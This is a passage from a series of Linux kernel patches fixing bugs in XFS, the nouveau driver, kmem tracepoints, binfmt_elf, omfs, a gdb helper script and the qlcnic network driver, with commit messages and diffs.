XFS_ATTR_FORK); + if (lock_mode) + xfs_iunlock(dp, lock_mode); return error; } diff --git a/fs/xfs/xfs_inode.c b/fs/xfs/xfs_inode.c index d6ebc85192b7..1117dd3ba123 100644 --- a/fs/xfs/xfs_inode.c +++ b/fs/xfs/xfs_inode.c @@ -1946,21 +1946,17 @@ xfs_inactive( /* * If there are attributes associated with the file then blow them away * now. The code calls a routine that recursively deconstructs the - * attribute fork. We need to just commit the current transaction - * because we can't use it for xfs_attr_inactive(). + * attribute fork. If also blows away the in-core attribute fork. */ - if (ip->i_d.di_anextents > 0) { - ASSERT(ip->i_d.di_forkoff != 0); - + if (XFS_IFORK_Q(ip)) { error = xfs_attr_inactive(ip); if (error) return; } - if (ip->i_afp) - xfs_idestroy_fork(ip, XFS_ATTR_FORK); - + ASSERT(!ip->i_afp); ASSERT(ip->i_d.di_anextents == 0); + ASSERT(ip->i_d.di_forkoff == 0); /* * Free the inode. From cddc116228cb9d51d3224d23ba3e61fbbc3ec3d2 Mon Sep 17 00:00:00 2001 From: Dave Chinner Date: Fri, 29 May 2015 07:40:32 +1000 Subject: [PATCH 419/872] xfs: xfs_iozero can return positive errno It was missed when we converted everything in XFs to use negative error numbers, so fix it now. Bug introduced in 3.17 by commit 2451337 ("xfs: global error sign conversion"), and should go back to stable kernels. Thanks to Brian Foster for noticing it. cc: # 3.17, 3.18, 3.19, 4.0 Signed-off-by: Dave Chinner Reviewed-by: Brian Foster Signed-off-by: Dave Chinner --- fs/xfs/xfs_file.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/fs/xfs/xfs_file.c b/fs/xfs/xfs_file.c index 8121e75352ee..3b7591224f4a 100644 --- a/fs/xfs/xfs_file.c +++ b/fs/xfs/xfs_file.c @@ -124,7 +124,7 @@ xfs_iozero( status = 0; } while (count); - return (-status); + return status; } int From 22419ac9fe5e79483596cebdbd1d1209c18bac1a Mon Sep 17 00:00:00 2001 From: Brian Foster Date: Fri, 29 May 2015 08:14:55 +1000 Subject: [PATCH 420/872] xfs: fix broken i_nlink accounting for whiteout tmpfile inode XFS uses the internal tmpfile() infrastructure for the whiteout inode used for RENAME_WHITEOUT operations. For tmpfile inodes, XFS allocates the inode, drops di_nlink, adds the inode to the agi unlinked list, calls d_tmpfile() which correspondingly drops i_nlink of the vfs inode, and then finishes the common inode setup (e.g., clear I_NEW and unlock). The d_tmpfile() call was originally made inxfs_create_tmpfile(), but was pulled up out of that function as part of the following commit to resolve a deadlock issue: 330033d6 xfs: fix tmpfile/selinux deadlock and initialize security As a result, callers of xfs_create_tmpfile() are responsible for either calling d_tmpfile() or fixing up i_nlink appropriately. The whiteout tmpfile allocation helper does neither. As a result, the vfs ->i_nlink becomes inconsistent with the on-disk ->di_nlink once xfs_rename() links it back into the source dentry and calls xfs_bumplink(). Update the assert in xfs_rename() to help detect this problem in the future and update xfs_rename_alloc_whiteout() to decrement the link count as part of the manual tmpfile inode setup. Signed-off-by: Brian Foster Reviewed-by: Dave Chinner Signed-off-by: Dave Chinner --- fs/xfs/xfs_inode.c | 10 ++++++++-- 1 file changed, 8 insertions(+), 2 deletions(-) diff --git a/fs/xfs/xfs_inode.c b/fs/xfs/xfs_inode.c index 1117dd3ba123..539a85fddbc2 100644 --- a/fs/xfs/xfs_inode.c +++ b/fs/xfs/xfs_inode.c @@ -2879,7 +2879,13 @@ xfs_rename_alloc_whiteout( if (error) return error; - /* Satisfy xfs_bumplink that this is a real tmpfile */ + /* + * Prepare the tmpfile inode as if it were created through the VFS. + * Otherwise, the link increment paths will complain about nlink 0->1. + * Drop the link count as done by d_tmpfile(), complete the inode setup + * and flag it as linkable. + */ + drop_nlink(VFS_I(tmpfile)); xfs_finish_inode_setup(tmpfile); VFS_I(tmpfile)->i_state |= I_LINKABLE; @@ -3147,7 +3153,7 @@ xfs_rename( * intermediate state on disk. */ if (wip) { - ASSERT(wip->i_d.di_nlink == 0); + ASSERT(VFS_I(wip)->i_nlink == 0 && wip->i_d.di_nlink == 0); error = xfs_bumplink(tp, wip); if (error) goto out_trans_abort; From 9ee971a0b8efbae472882b1d3e8e736f4d6e3da9 Mon Sep 17 00:00:00 2001 From: Lars Seipel Date: Thu, 21 May 2015 03:04:10 +0200 Subject: [PATCH 421/872] drm/nouveau/gr/gf100-: fix wrong constant definition Commit 3740c82590d8 ("drm/nouveau/gr/gf100-: add symbolic names for classes") introduced a wrong macro definition causing acceleration setup to fail. Fix it. Signed-off-by: Lars Seipel Fixes: 3740c82590d8 ("drm/nouveau/gr/gf100-: add symbolic names for classes") Signed-off-by: Ben Skeggs --- drivers/gpu/drm/nouveau/include/nvif/class.h | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/drivers/gpu/drm/nouveau/include/nvif/class.h b/drivers/gpu/drm/nouveau/include/nvif/class.h index 0b5af0fe8659..64f8b2f687d2 100644 --- a/drivers/gpu/drm/nouveau/include/nvif/class.h +++ b/drivers/gpu/drm/nouveau/include/nvif/class.h @@ -14,7 +14,7 @@ #define FERMI_TWOD_A 0x0000902d -#define FERMI_MEMORY_TO_MEMORY_FORMAT_A 0x0000903d +#define FERMI_MEMORY_TO_MEMORY_FORMAT_A 0x00009039 #define KEPLER_INLINE_TO_MEMORY_A 0x0000a040 #define KEPLER_INLINE_TO_MEMORY_B 0x0000a140 From c9ab50d21032ca8c5013f4d57e9aa866da78d7c7 Mon Sep 17 00:00:00 2001 From: Ben Skeggs Date: Thu, 21 May 2015 15:44:15 +1000 Subject: [PATCH 422/872] drm/nouveau/devinit/gf100: make the force-post condition more obvious And also more generic, so it can be used on newer chipsets. Signed-off-by: Ben Skeggs --- drivers/gpu/drm/nouveau/nvkm/subdev/devinit/gf100.c | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/drivers/gpu/drm/nouveau/nvkm/subdev/devinit/gf100.c b/drivers/gpu/drm/nouveau/nvkm/subdev/devinit/gf100.c index e8778c67578e..9f09037731fc 100644 --- a/drivers/gpu/drm/nouveau/nvkm/subdev/devinit/gf100.c +++ b/drivers/gpu/drm/nouveau/nvkm/subdev/devinit/gf100.c @@ -95,7 +95,9 @@ gf100_devinit_ctor(struct nvkm_object *parent, struct nvkm_object *engine, struct nvkm_oclass *oclass, void *data, u32 size, struct nvkm_object **pobject) { + struct nvkm_devinit_impl *impl = (void *)oclass; struct nv50_devinit_priv *priv; + u64 disable; int ret; ret = nvkm_devinit_create(parent, engine, oclass, &priv); @@ -103,7 +105,8 @@ gf100_devinit_ctor(struct nvkm_object *parent, struct nvkm_object *engine, if (ret) return ret; - if (nv_rd32(priv, 0x022500) & 0x00000001) + disable = impl->disable(&priv->base); + if (disable & (1ULL << NVDEV_ENGINE_DISP)) priv->base.post = true; return 0; From 4d4d6f7520b6fce065a8b8303ace9ec48b9e96e9 Mon Sep 17 00:00:00 2001 From: Ben Skeggs Date: Thu, 21 May 2015 15:47:16 +1000 Subject: [PATCH 423/872] drm/nouveau/devinit/gm100-: force devinit table execution on boards without PDISP Should fix fdo#89558 Signed-off-by: Ben Skeggs --- drivers/gpu/drm/nouveau/nvkm/subdev/devinit/gf100.c | 2 +- drivers/gpu/drm/nouveau/nvkm/subdev/devinit/gm107.c | 2 +- drivers/gpu/drm/nouveau/nvkm/subdev/devinit/gm204.c | 2 +- drivers/gpu/drm/nouveau/nvkm/subdev/devinit/nv50.h | 3 +++ 4 files changed, 6 insertions(+), 3 deletions(-) diff --git a/drivers/gpu/drm/nouveau/nvkm/subdev/devinit/gf100.c b/drivers/gpu/drm/nouveau/nvkm/subdev/devinit/gf100.c index 9f09037731fc..c61102f70805 100644 --- a/drivers/gpu/drm/nouveau/nvkm/subdev/devinit/gf100.c +++ b/drivers/gpu/drm/nouveau/nvkm/subdev/devinit/gf100.c @@ -90,7 +90,7 @@ gf100_devinit_disable(struct nvkm_devinit *devinit) return disable; } -static int +int gf100_devinit_ctor(struct nvkm_object *parent, struct nvkm_object *engine, struct nvkm_oclass *oclass, void *data, u32 size, struct nvkm_object **pobject) diff --git a/drivers/gpu/drm/nouveau/nvkm/subdev/devinit/gm107.c b/drivers/gpu/drm/nouveau/nvkm/subdev/devinit/gm107.c index b345a53e881d..87ca0ece37b4 100644 --- a/drivers/gpu/drm/nouveau/nvkm/subdev/devinit/gm107.c +++ b/drivers/gpu/drm/nouveau/nvkm/subdev/devinit/gm107.c @@ -48,7 +48,7 @@ struct nvkm_oclass * gm107_devinit_oclass = &(struct nvkm_devinit_impl) { .base.handle = NV_SUBDEV(DEVINIT, 0x07), .base.ofuncs = &(struct nvkm_ofuncs) { - .ctor = nv50_devinit_ctor, + .ctor = gf100_devinit_ctor, .dtor = _nvkm_devinit_dtor, .init = nv50_devinit_init, .fini = _nvkm_devinit_fini, diff --git a/drivers/gpu/drm/nouveau/nvkm/subdev/devinit/gm204.c b/drivers/gpu/drm/nouveau/nvkm/subdev/devinit/gm204.c index 535172c5f1ad..1076fcf0d716 100644 --- a/drivers/gpu/drm/nouveau/nvkm/subdev/devinit/gm204.c +++ b/drivers/gpu/drm/nouveau/nvkm/subdev/devinit/gm204.c @@ -161,7 +161,7 @@ struct nvkm_oclass * gm204_devinit_oclass = &(struct nvkm_devinit_impl) { .base.handle = NV_SUBDEV(DEVINIT, 0x07), .base.ofuncs = &(struct nvkm_ofuncs) { - .ctor = nv50_devinit_ctor, + .ctor = gf100_devinit_ctor, .dtor = _nvkm_devinit_dtor, .init = nv50_devinit_init, .fini = _nvkm_devinit_fini, diff --git a/drivers/gpu/drm/nouveau/nvkm/subdev/devinit/nv50.h b/drivers/gpu/drm/nouveau/nvkm/subdev/devinit/nv50.h index b882b65ff3cd..9243521c80ac 100644 --- a/drivers/gpu/drm/nouveau/nvkm/subdev/devinit/nv50.h +++ b/drivers/gpu/drm/nouveau/nvkm/subdev/devinit/nv50.h @@ -15,6 +15,9 @@ int nv50_devinit_pll_set(struct nvkm_devinit *, u32, u32); int gt215_devinit_pll_set(struct nvkm_devinit *, u32, u32); +int gf100_devinit_ctor(struct nvkm_object *, struct nvkm_object *, + struct nvkm_oclass *, void *, u32, + struct nvkm_object **); int gf100_devinit_pll_set(struct nvkm_devinit *, u32, u32); u64 gm107_devinit_disable(struct nvkm_devinit *); From aaea3938b5637ffb1d77e8b7707c207b24e02937 Mon Sep 17 00:00:00 2001 From: Ben Skeggs Date: Mon, 4 May 2015 12:26:00 +1000 Subject: [PATCH 424/872] drm/nouveau/gr/gm204: remove a stray printk Signed-off-by: Ben Skeggs --- drivers/gpu/drm/nouveau/nvkm/engine/gr/gm204.c | 1 - 1 file changed, 1 deletion(-) diff --git a/drivers/gpu/drm/nouveau/nvkm/engine/gr/gm204.c b/drivers/gpu/drm/nouveau/nvkm/engine/gr/gm204.c index 2f5eadd12a9b..fdb1dcf16a59 100644 --- a/drivers/gpu/drm/nouveau/nvkm/engine/gr/gm204.c +++ b/drivers/gpu/drm/nouveau/nvkm/engine/gr/gm204.c @@ -329,7 +329,6 @@ gm204_gr_init(struct nvkm_object *object) nv_mask(priv, 0x419cc0, 0x00000008, 0x00000008); for (gpc = 0; gpc < priv->gpc_nr; gpc++) { - printk(KERN_ERR "ppc %d %d\n", gpc, priv->ppc_nr[gpc]); for (ppc = 0; ppc < priv->ppc_nr[gpc]; ppc++) nv_wr32(priv, PPC_UNIT(gpc, ppc, 0x038), 0xc0000000); nv_wr32(priv, GPC_UNIT(gpc, 0x0420), 0xc0000000); From e5feb1ebaadfb1f5f70a3591e762d780232a4f5d Mon Sep 17 00:00:00 2001 From: "Shreyas B. Prabhu" Date: Thu, 28 May 2015 15:44:16 -0700 Subject: [PATCH 425/872] tracing/mm: don't trace kmem_cache_free on offline cpus Since tracepoints use RCU for protection, they must not be called on offline cpus. trace_kmem_cache_free can be called on an offline cpu in this scenario caught by LOCKDEP: =============================== [ INFO: suspicious RCU usage. ] 4.1.0-rc1+ #9 Not tainted ------------------------------- include/trace/events/kmem.h:148 suspicious rcu_dereference_check() usage! other info that might help us debug this: RCU used illegally from offline CPU! rcu_scheduler_active = 1, debug_locks = 1 no locks held by swapper/1/0. stack backtrace: CPU: 1 PID: 0 Comm: swapper/1 Not tainted 4.1.0-rc1+ #9 Call Trace: .dump_stack+0x98/0xd4 (unreliable) .lockdep_rcu_suspicious+0x108/0x170 .kmem_cache_free+0x344/0x4b0 .__mmdrop+0x4c/0x160 .idle_task_exit+0xf0/0x100 .pnv_smp_cpu_kill_self+0x58/0x2c0 .cpu_die+0x34/0x50 .arch_cpu_idle_dead+0x20/0x40 .cpu_startup_entry+0x708/0x7a0 .start_secondary+0x36c/0x3a0 start_secondary_prolog+0x10/0x14 Fix this by converting kmem_cache_free trace point into TRACE_EVENT_CONDITION where condition is cpu_online(smp_processor_id()) Signed-off-by: Shreyas B. Prabhu Reported-by: Aneesh Kumar K.V Reviewed-by: Preeti U Murthy Acked-by: Steven Rostedt Signed-off-by: Andrew Morton Signed-off-by: Linus Torvalds --- include/trace/events/kmem.h | 15 +++++++++++++-- 1 file changed, 13 insertions(+), 2 deletions(-) diff --git a/include/trace/events/kmem.h b/include/trace/events/kmem.h index 81ea59812117..78efa0a197a9 100644 --- a/include/trace/events/kmem.h +++ b/include/trace/events/kmem.h @@ -140,11 +140,22 @@ DEFINE_EVENT(kmem_free, kfree, TP_ARGS(call_site, ptr) ); -DEFINE_EVENT(kmem_free, kmem_cache_free, +DEFINE_EVENT_CONDITION(kmem_free, kmem_cache_free, TP_PROTO(unsigned long call_site, const void *ptr), - TP_ARGS(call_site, ptr) + TP_ARGS(call_site, ptr), + + /* + * This trace can be potentially called from an offlined cpu. + * Since trace points use RCU and RCU should not be used from + * offline cpus, filter such calls out. + * While this trace can be called from a preemptable section, + * it has no impact on the condition since tasks can migrate + * only from online cpus to other online cpus. Thus its safe + * to use raw_smp_processor_id. + */ + TP_CONDITION(cpu_online(raw_smp_processor_id())) ); TRACE_EVENT(mm_page_free, From 1f0c27b50f4f2567e649f49d77daee2bbf3f40e5 Mon Sep 17 00:00:00 2001 From: "Shreyas B. Prabhu" Date: Thu, 28 May 2015 15:44:19 -0700 Subject: [PATCH 426/872] tracing/mm: don't trace mm_page_free on offline cpus Since tracepoints use RCU for protection, they must not be called on offline cpus. trace_mm_page_free can be called on an offline cpu in this scenario caught by LOCKDEP: =============================== [ INFO: suspicious RCU usage. ] 4.1.0-rc1+ #9 Not tainted ------------------------------- include/trace/events/kmem.h:170 suspicious rcu_dereference_check() usage! other info that might help us debug this: RCU used illegally from offline CPU! rcu_scheduler_active = 1, debug_locks = 1 no locks held by swapper/1/0. stack backtrace: CPU: 1 PID: 0 Comm: swapper/1 Not tainted 4.1.0-rc1+ #9 Call Trace: .dump_stack+0x98/0xd4 (unreliable) .lockdep_rcu_suspicious+0x108/0x170 .free_pages_prepare+0x494/0x680 .free_hot_cold_page+0x50/0x280 .destroy_context+0x90/0xd0 .__mmdrop+0x58/0x160 .idle_task_exit+0xf0/0x100 .pnv_smp_cpu_kill_self+0x58/0x2c0 .cpu_die+0x34/0x50 .arch_cpu_idle_dead+0x20/0x40 .cpu_startup_entry+0x708/0x7a0 .start_secondary+0x36c/0x3a0 start_secondary_prolog+0x10/0x14 Fix this by converting mm_page_free trace point into TRACE_EVENT_CONDITION where condition is cpu_online(smp_processor_id()) Signed-off-by: Shreyas B. Prabhu Reviewed-by: Preeti U Murthy Acked-by: Steven Rostedt Signed-off-by: Andrew Morton Signed-off-by: Linus Torvalds --- include/trace/events/kmem.h | 14 +++++++++++++- 1 file changed, 13 insertions(+), 1 deletion(-) diff --git a/include/trace/events/kmem.h b/include/trace/events/kmem.h index 78efa0a197a9..aa863549e77a 100644 --- a/include/trace/events/kmem.h +++ b/include/trace/events/kmem.h @@ -158,12 +158,24 @@ DEFINE_EVENT_CONDITION(kmem_free, kmem_cache_free, TP_CONDITION(cpu_online(raw_smp_processor_id())) ); -TRACE_EVENT(mm_page_free, +TRACE_EVENT_CONDITION(mm_page_free, TP_PROTO(struct page *page, unsigned int order), TP_ARGS(page, order), + + /* + * This trace can be potentially called from an offlined cpu. + * Since trace points use RCU and RCU should not be used from + * offline cpus, filter such calls out. + * While this trace can be called from a preemptable section, + * it has no impact on the condition since tasks can migrate + * only from online cpus to other online cpus. Thus its safe + * to use raw_smp_processor_id. + */ + TP_CONDITION(cpu_online(raw_smp_processor_id())), + TP_STRUCT__entry( __field( unsigned long, pfn ) __field( unsigned int, order ) From 649b8de2f75145bf14cb1783688e16d51ac9b89a Mon Sep 17 00:00:00 2001 From: "Shreyas B. Prabhu" Date: Thu, 28 May 2015 15:44:22 -0700 Subject: [PATCH 427/872] tracing/mm: don't trace mm_page_pcpu_drain on offline cpus Since tracepoints use RCU for protection, they must not be called on offline cpus. trace_mm_page_pcpu_drain can be called on an offline cpu in this scenario caught by LOCKDEP: =============================== [ INFO: suspicious RCU usage. ] 4.1.0-rc1+ #9 Not tainted ------------------------------- include/trace/events/kmem.h:265 suspicious rcu_dereference_check() usage! other info that might help us debug this: RCU used illegally from offline CPU! rcu_scheduler_active = 1, debug_locks = 1 1 lock held by swapper/5/0: #0: (&(&zone->lock)->rlock){..-...}, at: [] .free_pcppages_bulk+0x70/0x920 stack backtrace: CPU: 5 PID: 0 Comm: swapper/5 Not tainted 4.1.0-rc1+ #9 Call Trace: .dump_stack+0x98/0xd4 (unreliable) .lockdep_rcu_suspicious+0x108/0x170 .free_pcppages_bulk+0x60c/0x920 .free_hot_cold_page+0x208/0x280 .destroy_context+0x90/0xd0 .__mmdrop+0x58/0x160 .idle_task_exit+0xf0/0x100 .pnv_smp_cpu_kill_self+0x58/0x2c0 .cpu_die+0x34/0x50 .arch_cpu_idle_dead+0x20/0x40 .cpu_startup_entry+0x708/0x7a0 .start_secondary+0x36c/0x3a0 start_secondary_prolog+0x10/0x14 Fix this by converting mm_page_pcpu_drain trace point into TRACE_EVENT_CONDITION where condition is cpu_online(smp_processor_id()) Signed-off-by: Shreyas B. Prabhu Reviewed-by: Preeti U Murthy Acked-by: Steven Rostedt Signed-off-by: Andrew Morton Signed-off-by: Linus Torvalds --- include/trace/events/kmem.h | 25 ++++++++++++++++++++++++- 1 file changed, 24 insertions(+), 1 deletion(-) diff --git a/include/trace/events/kmem.h b/include/trace/events/kmem.h index aa863549e77a..f7554fd7fc62 100644 --- a/include/trace/events/kmem.h +++ b/include/trace/events/kmem.h @@ -276,12 +276,35 @@ DEFINE_EVENT(mm_page, mm_page_alloc_zone_locked, TP_ARGS(page, order, migratetype) ); -DEFINE_EVENT_PRINT(mm_page, mm_page_pcpu_drain, +TRACE_EVENT_CONDITION(mm_page_pcpu_drain, TP_PROTO(struct page *page, unsigned int order, int migratetype), TP_ARGS(page, order, migratetype), + /* + * This trace can be potentially called from an offlined cpu. + * Since trace points use RCU and RCU should not be used from + * offline cpus, filter such calls out. + * While this trace can be called from a preemptable section, + * it has no impact on the condition since tasks can migrate + * only from online cpus to other online cpus. Thus its safe + * to use raw_smp_processor_id. + */ + TP_CONDITION(cpu_online(raw_smp_processor_id())), + + TP_STRUCT__entry( + __field( unsigned long, pfn ) + __field( unsigned int, order ) + __field( int, migratetype ) + ), + + TP_fast_assign( + __entry->pfn = page ? page_to_pfn(page) : -1UL; + __entry->order = order; + __entry->migratetype = migratetype; + ), + TP_printk("page=%p pfn=%lu order=%d migratetype=%d", pfn_to_page(__entry->pfn), __entry->pfn, __entry->order, __entry->migratetype) From 2b1d3ae940acd11be44c6eced5873d47c2e00ffa Mon Sep 17 00:00:00 2001 From: Andrew Morton Date: Thu, 28 May 2015 15:44:24 -0700 Subject: [PATCH 428/872] fs/binfmt_elf.c:load_elf_binary(): return -EINVAL on zero-length mappings load_elf_binary() returns `retval', not `error'. Fixes: a87938b2e246b81b4fb ("fs/binfmt_elf.c: fix bug in loading of PIE binaries") Reported-by: James Hogan Cc: Michael Davidson Signed-off-by: Andrew Morton Signed-off-by: Linus Torvalds --- fs/binfmt_elf.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/fs/binfmt_elf.c b/fs/binfmt_elf.c index 241ef68d2893..cd46e4158830 100644 --- a/fs/binfmt_elf.c +++ b/fs/binfmt_elf.c @@ -918,7 +918,7 @@ static int load_elf_binary(struct linux_binprm *bprm) total_size = total_mapping_size(elf_phdata, loc->elf_ex.e_phnum); if (!total_size) { - error = -EINVAL; + retval = -EINVAL; goto out_free_dentry; } } From cd4e6c91a114a23b0b8d61d460a2d1d14e3b45f4 Mon Sep 17 00:00:00 2001 From: Joe Perches Date: Thu, 28 May 2015 15:44:27 -0700 Subject: [PATCH 429/872] MAINTAINERS: update CAPABILITIES pattern Commit 1ddd3b4e07a4 ("LSM: Remove unused capability.c") removed the file, remove the file pattern. Signed-off-by: Joe Perches Acked-by: Casey Schaufler Signed-off-by: Andrew Morton Signed-off-by: Linus Torvalds --- MAINTAINERS | 1 - 1 file changed, 1 deletion(-) diff --git a/MAINTAINERS b/MAINTAINERS index 474bcb6c0bac..af802b357b6a 100644 --- a/MAINTAINERS +++ b/MAINTAINERS @@ -2427,7 +2427,6 @@ L: linux-security-module@vger.kernel.org S: Supported F: include/linux/capability.h F: include/uapi/linux/capability.h -F: security/capability.c F: security/commoncap.c F: kernel/capability.c From dcbff39da3d815f08750552fdd04f96b51751129 Mon Sep 17 00:00:00 2001 From: Sasha Levin Date: Thu, 28 May 2015 15:44:29 -0700 Subject: [PATCH 430/872] fs, omfs: add NULL terminator in the end up the token list match_token() expects a NULL terminator at the end of the token list so that it would know where to stop. Not having one causes it to overrun to invalid memory. In practice, passing a mount option that omfs didn't recognize would sometimes panic the system. Signed-off-by: Sasha Levin Signed-off-by: Bob Copeland Cc: Signed-off-by: Andrew Morton Signed-off-by: Linus Torvalds --- fs/omfs/inode.c | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/fs/omfs/inode.c b/fs/omfs/inode.c index 138321b0c6c2..70d4191cf33d 100644 --- a/fs/omfs/inode.c +++ b/fs/omfs/inode.c @@ -359,7 +359,7 @@ static int omfs_get_imap(struct super_block *sb) } enum { - Opt_uid, Opt_gid, Opt_umask, Opt_dmask, Opt_fmask + Opt_uid, Opt_gid, Opt_umask, Opt_dmask, Opt_fmask, Opt_err }; static const match_table_t tokens = { @@ -368,6 +368,7 @@ static const match_table_t tokens = { {Opt_umask, "umask=%o"}, {Opt_dmask, "dmask=%o"}, {Opt_fmask, "fmask=%o"}, + {Opt_err, NULL}, }; static int parse_options(char *options, struct omfs_sb_info *sbi) From 3a281f946640542a7a7372f436e101ee1fbc4c97 Mon Sep 17 00:00:00 2001 From: Bob Copeland Date: Thu, 28 May 2015 15:44:32 -0700 Subject: [PATCH 431/872] omfs: set error return when d_make_root() fails A static checker found the following issue in the error path for omfs_fill_super: fs/omfs/inode.c:552 omfs_fill_super() warn: missing error code here? 'd_make_root()' failed. 'ret' = '0' Fix by returning -ENOMEM in this case. Signed-off-by: Bob Copeland Reported-by: Dan Carpenter Signed-off-by: Andrew Morton Signed-off-by: Linus Torvalds --- fs/omfs/inode.c | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/fs/omfs/inode.c b/fs/omfs/inode.c index 70d4191cf33d..6ce542c11f98 100644 --- a/fs/omfs/inode.c +++ b/fs/omfs/inode.c @@ -549,8 +549,10 @@ static int omfs_fill_super(struct super_block *sb, void *data, int silent) } sb->s_root = d_make_root(root); - if (!sb->s_root) + if (!sb->s_root) { + ret = -ENOMEM; goto out_brelse_bh2; + } printk(KERN_DEBUG "omfs: Mounted volume %s\n", omfs_rb->r_name); ret = 0; From c0345ee57d461343586b5e1e2f9c3c3766d07fe6 Mon Sep 17 00:00:00 2001 From: Bob Copeland Date: Thu, 28 May 2015 15:44:35 -0700 Subject: [PATCH 432/872] omfs: fix sign confusion for bitmap loop counter The count variable is used to iterate down to (below) zero from the size of the bitmap and handle the one-filling the remainder of the last partial bitmap block. The loop conditional expects count to be signed in order to detect when the final block is processed, after which count goes negative. Unfortunately, a recent change made this unsigned along with some other related fields. The result of is this is that during mount, omfs_get_imap will overrun the bitmap array and corrupt memory unless number of blocks happens to be a multiple of 8 * blocksize. Fix by changing count back to signed: it is guaranteed to fit in an s32 without overflow due to an enforced limit on the number of blocks in the filesystem. Signed-off-by: Bob Copeland Cc: Signed-off-by: Andrew Morton Signed-off-by: Linus Torvalds --- fs/omfs/inode.c | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/fs/omfs/inode.c b/fs/omfs/inode.c index 6ce542c11f98..3d935c81789a 100644 --- a/fs/omfs/inode.c +++ b/fs/omfs/inode.c @@ -306,7 +306,8 @@ static const struct super_operations omfs_sops = { */ static int omfs_get_imap(struct super_block *sb) { - unsigned int bitmap_size, count, array_size; + unsigned int bitmap_size, array_size; + int count; struct omfs_sb_info *sbi = OMFS_SB(sb); struct buffer_head *bh; unsigned long **ptr; From 5a6b2b36a8249ec9dfb2a714acadad86d9cc0aee Mon Sep 17 00:00:00 2001 From: Bob Copeland Date: Thu, 28 May 2015 15:44:37 -0700 Subject: [PATCH 433/872] omfs: fix potential integer overflow in allocator Both 'i' and 'bits_per_entry' are signed integers but the result is a u64 block number. Cast i to u64 to avoid truncation on 32-bit targets. Found by Coverity (CID 200679). Signed-off-by: Bob Copeland Signed-off-by: Andrew Morton Signed-off-by: Linus Torvalds --- fs/omfs/bitmap.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/fs/omfs/bitmap.c b/fs/omfs/bitmap.c index 082234581d05..83f4e76511c2 100644 --- a/fs/omfs/bitmap.c +++ b/fs/omfs/bitmap.c @@ -159,7 +159,7 @@ int omfs_allocate_range(struct super_block *sb, goto out; found: - *return_block = i * bits_per_entry + bit; + *return_block = (u64) i * bits_per_entry + bit; *return_size = run; ret = set_run(sb, i, bits_per_entry, bit, run, 1); From ca3f172c197b5fa6b2693f5f93d4928a1420fb07 Mon Sep 17 00:00:00 2001 From: Adrien Schildknecht Date: Thu, 28 May 2015 15:44:40 -0700 Subject: [PATCH 434/872] scripts/gdb: fix lx-lsmod refcnt Commit 2f35c41f58a9 ("module: Replace module_ref with atomic_t refcnt") changes the way refcnt is handled but did not update the gdb script to use the new variable. Since refcnt is not per-cpu anymore, we can directly read its value. Signed-off-by: Adrien Schildknecht Reviewed-by: Jan Kiszka Cc: Pantelis Koukousoulas Signed-off-by: Andrew Morton Signed-off-by: Linus Torvalds --- scripts/gdb/linux/modules.py | 9 +-------- 1 file changed, 1 insertion(+), 8 deletions(-) diff --git a/scripts/gdb/linux/modules.py b/scripts/gdb/linux/modules.py index a1504c4f1900..25db8cff44a2 100644 --- a/scripts/gdb/linux/modules.py +++ b/scripts/gdb/linux/modules.py @@ -73,18 +73,11 @@ def invoke(self, arg, from_tty): " " if utils.get_long_type().sizeof == 8 else "")) for module in module_list(): - ref = 0 - module_refptr = module['refptr'] - for cpu in cpus.cpu_list("cpu_possible_mask"): - refptr = cpus.per_cpu(module_refptr, cpu) - ref += refptr['incs'] - ref -= refptr['decs'] - gdb.write("{address} {name:<19} {size:>8} {ref}".format( address=str(module['module_core']).split()[0], name=module['name'].string(), size=str(module['core_size']), - ref=str(ref))) + ref=str(module['refcnt']['counter']))) source_list = module['source_list'] t = self._module_use_type.get_type().pointer() From d7a32b6e6b1ad361ea89805855ef82dd1dea9128 Mon Sep 17 00:00:00 2001 From: Vladimir Zapolskiy Date: Tue, 26 May 2015 03:49:45 +0300 Subject: [PATCH 435/872] net: qlcnic: clean up sysfs error codes Replace confusing QL_STATUS_INVALID_PARAM == -1 == -EPERM with -EINVAL and QLC_STATUS_UNSUPPORTED_CMD == -2 == -ENOENT with -EOPNOTSUPP, the latter error code is arguable, but it is already used in the driver, so let it be here as well. Also remove always false (!buf) check on read(), the driver should not care if userspace gets its EFAULT or not. Signed-off-by: Vladimir Zapolskiy Acked-by: Rajesh Borundia Signed-off-by: David S. Miller --- drivers/net/ethernet/qlogic/qlcnic/qlcnic.h | 3 - .../net/ethernet/qlogic/qlcnic/qlcnic_main.c | 2 +- .../net/ethernet/qlogic/qlcnic/qlcnic_sysfs.c | 77 +++++++++---------- 3 files changed, 36 insertions(+), 46 deletions(-) diff --git a/drivers/net/ethernet/qlogic/qlcnic/qlcnic.h b/drivers/net/ethernet/qlogic/qlcnic/qlcnic.h index f221126a5c4e..055f3763e577 100644 --- a/drivers/net/ethernet/qlogic/qlcnic/qlcnic.h +++ b/drivers/net/ethernet/qlogic/qlcnic/qlcnic.h @@ -1326,9 +1326,6 @@ struct qlcnic_eswitch { }; -/* Return codes for Error handling */ -#define QL_STATUS_INVALID_PARAM -1 - #define MAX_BW 100 /* % of link speed */ #define MIN_BW 1 /* % of link speed */ #define MAX_VLAN_ID 4095 diff --git a/drivers/net/ethernet/qlogic/qlcnic/qlcnic_main.c b/drivers/net/ethernet/qlogic/qlcnic/qlcnic_main.c index 367f3976df56..2f6cc423ab1d 100644 --- a/drivers/net/ethernet/qlogic/qlcnic/qlcnic_main.c +++ b/drivers/net/ethernet/qlogic/qlcnic/qlcnic_main.c @@ -1031,7 +1031,7 @@ int qlcnic_init_pci_info(struct qlcnic_adapter *adapter) pfn = pci_info[i].id; if (pfn >= ahw->max_vnic_func) { - ret = QL_STATUS_INVALID_PARAM; + ret = -EINVAL; dev_err(&adapter->pdev->dev, "%s: Invalid function 0x%x, max 0x%x\n", __func__, pfn, ahw->max_vnic_func); goto err_eswitch; diff --git a/drivers/net/ethernet/qlogic/qlcnic/qlcnic_sysfs.c b/drivers/net/ethernet/qlogic/qlcnic/qlcnic_sysfs.c index 59a721fba018..05c28f2c6df7 100644 --- 